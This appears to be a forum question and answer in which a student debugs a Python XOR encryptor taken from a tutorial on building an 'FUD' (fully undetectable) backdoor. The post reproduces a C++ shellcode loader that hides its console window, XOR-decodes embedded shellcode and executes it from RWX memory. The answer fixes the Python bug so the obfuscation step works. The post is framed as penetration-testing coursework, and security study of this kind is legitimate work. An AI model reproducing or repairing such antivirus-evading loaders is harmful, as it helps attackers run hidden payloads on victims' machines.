I am working on a project for my college cybersecurity class on penetration testing. I have found a site (https://macrosec.tech/index.php/2020/09/20/creating-a-fud-backdoor/) that has python code for an xor encryptor as well as c++ code for a loader. The python code is meant to be run in the command line taking an input file and specifying an output file. For example, you would run the code by running python xor_file.py sample.txt > output_file.txt. However, when I run the code it doesn't work. I am very inexperienced with encryption and python so any help would be greatly appreciated. The code is below. `
import sys
KEY = 'x'
def xor(data, key):
key = str(key)
l = len(key)
output_str = ''
for i in range(len(data)):
current = data[i]
current_key = key[i % len(key)]
output_str += chr(ord(current) ^ ord(current_key))
return output_str
def printCiphertext(ciphertext):
print("{ 0x" + ", 0x".join(hex(ord(x))[2:] for x in ciphertext) + "};")
try:
plaintext = open(sys.argv[1], 'rb').read()
except:
print('File argument needed! %s ' % sys.argv[0])
sys.exit()
ciphertext = xor(plaintext, KEY)
print("{ 0x" + ", 0x".join(hex(ord(x))[2:] for x in ciphertext) + "};")
The loader code is as follows:
#include <windows.h>
#include <iostream>
int main(int argc, char **argv) {
ShowWindow(GetConsoleWindow(), SW_HIDE);
char b[] = {/* your XORd, with key of ‘x’, shellcode goes here i.e. 0x4C,0x4F, 0x4C */};
char c[sizeof b];
for (int i = 0; i < sizeof b; i++) {c[i] = b[i] ^ ‘x’;}
void *exec = VirtualAlloc(0, sizeof c, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, c, sizeof c);
((void(*)())exec)();
}
I have messed around with it a bit but every time I fix an error a new one replaces it.
When I run the python code you included using Python 3.11, I get the following error:
Traceback (most recent call last):
File "/Users/myusername/xor_file.py", line 29, in <module>
ciphertext = xor(plaintext, KEY)
^^^^^^^^^^^^^^^^^^^
File "/Users/myusername/xor_file.py", line 17, in xor
output_str += chr(ord(current) ^ ord(current_key))
^^^^^^^^^^^^
TypeError: ord() expected string of length 1, but int found
You open the file and read it in as binary data.
In this case, the call to ord(current)
is redundant, because current
is already an integer value after current = data[i]
. See this link for more information.
If you remove ord()
around current
, the code runs.